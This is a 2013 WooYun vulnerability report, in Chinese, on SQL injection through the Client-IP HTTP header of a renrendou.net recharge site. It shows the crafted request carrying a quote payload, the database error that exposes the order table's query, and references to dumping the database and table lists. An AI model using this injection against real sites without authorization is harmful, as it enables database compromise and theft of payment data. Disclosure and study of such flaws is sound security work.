当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045092

漏洞标题:人人豆海外充值站http头部注入导致数据库沦陷#1

相关厂商:人人豆充值网站

漏洞作者: 无力落地の白

提交时间:2013-12-06 11:15

修复时间:2014-01-20 11:15

公开时间:2014-01-20 11:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

158游戏点卡网针对海外用户提供游戏点卡、游戏卡、游戏币、游戏装备、Q币在线购买服务,支持Visa,Master Card,paypal,moneybookers,国际信用卡等多种。
这次我射的是 人人豆 充值的分站, mysql数据库沦陷,后台沦陷。

详细说明:

这次注入是http头部注入,http请求是这样
GET php_paypal/process.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: 1'
Referer: http://renrendou.net/
Cookie: PHPSESSID=s99mk34clkl3ike5kcife5f0k0
Host: renrendou.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
报错 :
Database error: Invalid SQL: INSERT INTO `dingdan` ( `id` , `dingdanid` , `title` , `price` , `zhifu_type` , `money` , `bizhong` , `bizhong_en` , `renrenid` , `paypal` , `paypal_name` , `payment_date` , `paypal_addr` , `paypal_verify` , `residence_country` , `paypal_country` , `create_time` , `zhifu_time` , `faka_time` , `ip` , `country` , `stat` , `isdel` , `queren_time` , `faka_user` , `ka` , `ka_from` ) VALUES ( NULL , '2013120515461134505', '0 人人��? , '0' , 'paypal', '0.00', '', '', '', NULL , NULL , NULL , NULL , '0', NULL , NULL , now(), NULL , NULL , '1'"', '', '0', '0', NULL , NULL , NULL , NULL );
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"', '', '0', '0', NULL , NULL , NULL , NULL )' at line 31)
Session halted.
存在注入点的是 CLIENT-IP 参数
貌似wooyun上发http头部注入的比较少?
新姿势··

漏洞证明:

后台

.gif


--dbs

dbs.gif


--tables

tables.jpg


不截图了。。敏感信息太多。。。我打消心中邪恶的念头 只为wooyun 20RANK 。。求别失望。。

修复方案:

这个找代码开发人员修复吧~

版权声明:转载请注明来源 无力落地の白@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝